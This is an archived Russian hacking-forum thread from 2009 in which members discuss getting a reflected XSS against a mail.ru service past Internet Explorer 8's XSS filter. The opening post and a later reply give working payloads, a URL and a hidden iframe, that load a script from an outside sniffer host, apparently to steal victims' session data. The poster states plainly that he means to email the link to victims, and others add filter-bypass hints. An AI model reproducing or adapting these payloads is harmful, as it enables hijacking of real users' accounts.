ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS не пробивает Internet Exporer 8
  #1  
Старый 23.12.2009, 23:08
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию XSS не пробивает Internet Exporer 8

Столкнулся с проблемой, что пассивка XSS не пробивает Internet Exporer 8

PHP код:
http://11x11.mail.ru/?&url='"><script src=http://sniffer.ru/js.js></script> 
Блокируется выполнение сценариев




кто как обходит защиту ИЕ 8 ?

Запарился уже кодировать , все остальные браузеры пробивает, а на ИЕ 8 полный тормоз.

Последний раз редактировалось satana-fu; 24.12.2009 в 02:42..
 
Ответить с цитированием

  #2  
Старый 24.12.2009, 00:40
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541

Репутация: 214


По умолчанию

зря пассивку спалил
пофиксят
 
Ответить с цитированием

  #3  
Старый 24.12.2009, 00:58
n-000
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
Провел на форуме:
495411

Репутация: 91
Отправить сообщение для n-000 с помощью ICQ
По умолчанию

пробывал тоже самое результата - ноль !
 
Ответить с цитированием

  #4  
Старый 24.12.2009, 01:23
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Ого о_0 она все еще пашет... ей уже как месяца 2 о_0
 
Ответить с цитированием

  #5  
Старый 24.12.2009, 01:28
ntldr
Постоянный
Регистрация: 04.12.2007
Сообщений: 424
Провел на форуме:
2364957

Репутация: 479
По умолчанию

Цитата:
Сообщение от Tigger  
Ого о_0 она все еще пашет... ей уже как месяца 2 о_0
одна найденная мной в теме куда скидывались XSS от мейлру когда-то год мне прослужила
 
Ответить с цитированием

  #6  
Старый 24.12.2009, 02:36
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию

Цитата:
Сообщение от svesve  
зря пассивку спалил
пофиксят
пассивку свою я выкладывать не стал, а взял наугад из темы пассивные ксс, дабы палева меньше было. так что это палевная пассивка, приведенная чисто для примера.

Цитата:
Сообщение от dober.man  
satana-fu, то что у вас на скрине - информационная панель. То что блокирует - xss-фильтр, присущий ie7-8.
Что вы пытаетесь кодировать?! XSS-фильтр можно отключиться в настройках, во вкладке безопасность. А обходится он при помощи js-обфускации, но с пассивными xss этот номер не пройдет.
Так что, если хотите увидеть результат в вашем конкретном примере - просто отключите фильтр.

upd:
p.s. а вообще, если бы вы кликнули мышью по этой выпавшей информационной панели - поняли бы все сами, т.к. там все прекрасно написанно!

А если совсем худо - то вот

доберман, я прекрасно знаю, что у меня на скрине, а скрин сделал чтоб было общее понятие как блокируется.
кажется или я вопрос неправильно поставил или мне загодя неправильно отвечают.

смотри, я пытаюсь кодировать фрейм с пассивкой,
PHP код:
<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="http://11x11.mail.ru/?&url='"><script src=http://sniffer.ru/js.js></script>"></iframe> 
закодировать его в яваскрипт, и дальше уже запускать в теле страницы скриптом <script src=закодированный.js></script> ан не пробивает, все равно распознается XSS

совет про отключение фильтра ваще не к месту))), иначе при отправке жертве письма с ксс, мне надо отправлять следующий текст "если у вас ИЕ 7-8, то отключите, пожалуйста, фильтр безопасности перед тем как перейдете по следующей ссылке." ?


Цитата:
p.s. а вообще, если бы вы кликнули мышью по этой выпавшей информационной панели - поняли бы все сами, т.к. там все прекрасно написанно!
мне надо было заскринить весь инструктаж по ксс, который выводится при клике мышкой?


весь вопрос заключается в том, как в ИЕ 8 запустить пассивную ксс при включенном фильтре, как заставить ссылку обработаться в ИЕ 8, а не в том, что такое ксс и с чем его кушать.

ps. за ссылку спасибо, пошел читать, может найду что нибудь полезное.

Последний раз редактировалось satana-fu; 24.12.2009 в 02:47..
 
Ответить с цитированием

  #7  
Старый 24.12.2009, 19:09
brain[pillow]
Участник форума
Регистрация: 07.11.2008
Сообщений: 124
Провел на форуме:
1483379

Репутация: 386
Отправить сообщение для brain[pillow] с помощью ICQ
По умолчанию

Обойти фильтр "при помощи js-обфускации" как советует товарищ dober.man не выйдет никоим образом. Ищите материал по обходу WAF (был то ли на конференции BlackHat, то ли в одном из отчётов об обходе WAF от Bitrix после проведения Chaos Constructions 2009). В нём было разобраны методы обхода mod_security, сухосин-патча и Анти-XSS фильтра в IE7. Ссылку дал бы, но не помню где Так что - ищите.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
Xss: Cегодня и вчера. Опрос Constantine Болталка 48 07.12.2009 08:57
Internet Anonym VPN 300 Dmitriy507 Анонимность 6 23.01.2009 03:35
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ